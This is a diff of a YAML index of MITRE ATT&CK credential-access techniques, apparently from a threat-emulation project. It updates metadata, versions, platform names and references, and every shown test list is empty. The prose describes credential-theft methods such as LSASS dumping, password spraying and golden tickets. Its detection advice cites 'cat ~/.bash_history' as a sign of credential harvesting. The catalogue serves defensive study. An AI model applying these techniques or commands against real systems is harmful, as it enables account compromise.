         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45333,21 +46100,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45358,7 +46124,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45392,7 +46158,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45420,7 +46186,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45431,14 +46197,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45546,12 +46311,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45588,6 +46352,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45600,7 +46365,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45650,12 +46415,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45681,6 +46445,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45696,18 +46461,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45734,14 +46499,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45752,13 +46514,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45772,6 +46534,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45782,12 +46545,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45862,7 +46625,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -45908,7 +46670,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -45943,16 +46705,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -45962,21 +46722,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -46025,33 +46787,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46066,25 +46806,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -46158,7 +46916,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46220,11 +46977,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46273,6 +47029,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46281,6 +47038,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46291,13 +47049,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46353,44 +47112,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46407,25 +47133,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46500,11 +47255,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46548,11 +47302,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46576,8 +47329,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46593,11 +47346,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46608,11 +47360,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46622,16 +47376,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46669,13 +47423,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46684,6 +47435,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46691,11 +47443,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46713,13 +47465,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46732,6 +47481,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46745,12 +47495,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
